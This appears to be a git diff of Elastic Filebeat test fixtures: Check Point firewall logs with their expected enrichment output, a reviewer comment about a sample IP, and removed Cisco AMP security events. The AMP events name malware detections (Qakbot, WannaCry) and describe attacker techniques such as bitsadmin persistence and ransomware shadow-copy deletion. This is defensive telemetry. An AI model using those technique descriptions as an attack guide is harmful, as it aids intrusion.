- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "192.124.249.36",
 "destination.port": 80,
 "event.action": "Accept",
@@ -4282,16 +4063,6 @@
 "client.ip": "192.168.1.100",
 "client.nat.port": 43360,
 "client.port": 62122,
- "destination.as.number": 25046,
- "destination.as.organization.name": "Check Point Software Technologies LTD",
- "destination.geo.city_name": "Tel Aviv",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "IL",
- "destination.geo.country_name": "Israel",
- "destination.geo.location.lat": 32.0678,
- "destination.geo.location.lon": 34.7647,
- "destination.geo.region_iso_code": "IL-TA",
- "destination.geo.region_name": "Tel Aviv",
 "destination.ip": "194.29.39.10",
 "destination.port": 443,
 "event.action": "Accept",
@@ -4458,13 +4229,8 @@ "client.ip": "192.168.1.100", "client.nat.port": 26695, "client.port": 55424, - "destination.as.number": 16625, + "destination.as.number": 35994, "destination.as.organization.name": "Akamai Technologies, Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "104.81.142.43", "destination.port": 443, "event.action": "Accept", @@ -4577,13 +4343,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 26696, "client.port": 49026, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.31", "destination.port": 80, "event.action": "Accept", @@ -4696,13 +4455,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 26697, "client.port": 62514, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.41", "destination.port": 80, "event.action": "Accept", 
@@ -4815,13 +4567,8 @@ "client.ip": "192.168.1.100", "client.nat.port": 10024, "client.port": 41902, - "destination.as.number": 16625, + "destination.as.number": 35994, "destination.as.organization.name": "Akamai Technologies, Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "104.99.234.45", "destination.port": 443, "event.action": "Accept", @@ -4934,13 +4681,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 43361, "client.port": 61490, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.36", "destination.port": 80, "event.action": "Accept", @@ -5053,13 +4793,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 26698, "client.port": 49042, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.31", "destination.port": 80, "event.action": "Accept", 
@@ -5172,13 +4905,8 @@ "client.ip": "192.168.1.100", "client.nat.port": 26699, "client.port": 41914, - "destination.as.number": 16625, + "destination.as.number": 35994, "destination.as.organization.name": "Akamai Technologies, Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "104.99.234.45", "destination.port": 443, "event.action": "Accept", @@ -5291,13 +5019,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 10025, "client.port": 62534, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.41", "destination.port": 80, "event.action": "Accept", @@ -5410,13 +5131,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 10026, "client.port": 61500, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.36", "destination.port": 80, "event.action": "Accept", 
@@ -5529,13 +5243,8 @@ "client.ip": "192.168.1.100", "client.nat.port": 10027, "client.port": 41938, - "destination.as.number": 16625, + "destination.as.number": 35994, "destination.as.organization.name": "Akamai Technologies, Inc.", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "104.99.234.45", "destination.port": 443, "event.action": "Accept", @@ -5648,13 +5357,6 @@ "client.ip": "192.168.1.100", "client.nat.port": 43362, "client.port": 49102, - "destination.as.number": 30148, - "destination.as.organization.name": "Sucuri", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "192.124.249.31", "destination.port": 80, "event.action": "Accept", diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log index 8c3ff5d26878..3e649fca3090 100644 --- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log +++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log 
@@ -1,2 +1,2 @@ <134>1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; time:"1594646954"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"1.1.1.1"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"1.1.1.1"] +<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"89.160.20.156"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"89.160.20.156"] 
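Review bot: The replacement sample address 89.160.20.156 in the Drop record is a routable public IP, and the two checkpoint_with_time.log-expected.json hunks that follow pin its ASN and geo enrichment (29518, Bredband2 AB, Linköping, SE-E) as the expected output. Those values describe a third party's network and are only as stable as the GeoIP database the tests run against; the preceding expected-JSON hunks for this module show exactly that kind of drift, where the same Akamai addresses moved from AS 16625 to 35994 and lost their geo fields. Presumably the address was chosen because it resolves deterministically in a fixed test database, but nothing in the diff records that, so the next regeneration can silently churn these values again; a one-line note in the commit message such as `Fixture IPs chosen to resolve in the bundled test GeoIP/ASN database; regenerate expected files against that database only.` would make the dependency explicit. If deterministic enrichment is not the goal, a reserved range such as 192.0.2.0/24 (RFC 5737) keeps the fixture free of real third-party attribution, at the cost of no enrichment fields.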
diff --git a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json index 5298751435ef..13bdc2ed7e75 100644 --- a/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json +++ b/x-pack/filebeat/module/checkpoint/firewall/test/checkpoint_with_time.log-expected.json @@ -56,16 +56,19 @@ { "@timestamp": "2021-05-05T12:27:09.000Z", "checkpoint.action_reason_msg": "Dropped by multiportal infrastructure", - "client.ip": "1.1.1.1", + "client.ip": "89.160.20.156", "client.port": 52780, - "destination.as.number": 13335, - "destination.as.organization.name": "Cloudflare, Inc.", - "destination.geo.continent_name": "Oceania", - "destination.geo.country_iso_code": "AU", - "destination.geo.country_name": "Australia", - "destination.geo.location.lat": -33.494, - "destination.geo.location.lon": 143.2104, - "destination.ip": "1.1.1.1", + "destination.as.number": 29518, + "destination.as.organization.name": "Bredband2 AB", + "destination.geo.city_name": "Link\u00f6ping", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "SE", + "destination.geo.country_name": "Sweden", + "destination.geo.location.lat": 58.4167, + "destination.geo.location.lon": 15.6167, + "destination.geo.region_iso_code": "SE-E", + "destination.geo.region_name": "\u00d6sterg\u00f6tland County", + "destination.ip": "89.160.20.156", "destination.port": 80, "event.action": "Drop", "event.category": [ 
@@ -88,20 +91,23 @@ "observer.type": "firewall", "observer.vendor": "Checkpoint", "related.ip": [ - "1.1.1.1", - "1.1.1.1" + "89.160.20.156", + "89.160.20.156" ], - "server.ip": "1.1.1.1", + "server.ip": "89.160.20.156", "server.port": 80, "service.type": "checkpoint", - "source.as.number": 13335, - "source.as.organization.name": "Cloudflare, Inc.", - "source.geo.continent_name": "Oceania", - "source.geo.country_iso_code": "AU", - "source.geo.country_name": "Australia", - "source.geo.location.lat": -33.494, - "source.geo.location.lon": 143.2104, - "source.ip": "1.1.1.1", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "source.port": 52780, "tags": [ "checkpoint-firewall", diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log index 211de5d2bc95..c21dc6c5a271 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log 
@@ -1,49 +1,49 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a
8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5
e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud 